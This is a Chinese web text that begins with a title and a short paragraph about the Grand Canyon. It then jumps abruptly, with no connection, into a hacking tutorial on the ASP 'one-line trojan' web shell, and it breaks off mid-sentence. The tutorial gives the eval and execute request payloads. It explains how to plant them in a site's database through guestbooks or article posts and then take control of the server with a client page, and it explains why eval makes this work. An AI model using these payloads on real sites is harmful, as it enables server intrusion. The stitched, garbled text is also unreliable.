美国大峡谷

邱培呸呸呸

美国大峡谷引（Grand Canyon）是一个举世闻名的自然奇观，由于科罗拉多河穿流其中，故又名科罗拉多大峡谷，它是联合国教科文组织选为受保护的天然遗产之一。发源于科罗拉多州的落基山，洪流奔泻，经犹他州、亚利桑那州，由加利福尼亚州的加利福尼亚湾入海1 基本简介
　　黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码：
一句话木马

　　<%execute request("value")%>
　　<%eval request("value")%>(现在比较多见的，而且字符少，对表单字数有限制的地方特别的实用)
　　当知道了数据库的URL，就可以利用本地一张网页进行连接得到Webshell。（不知道数据库也可以，只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。）　　这就被称为一句话木马，它是基于B/S结构的。
2 使用方法
　　首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库或者加进asp网页。
记住!我们的目的是把一句话<%execute request("value")%>添加到数据库,无论任何方式!
　　然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后杀进去!,这就可以干你想干的事情了!(作者:蚊虫)
3 木马原理
　　首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form(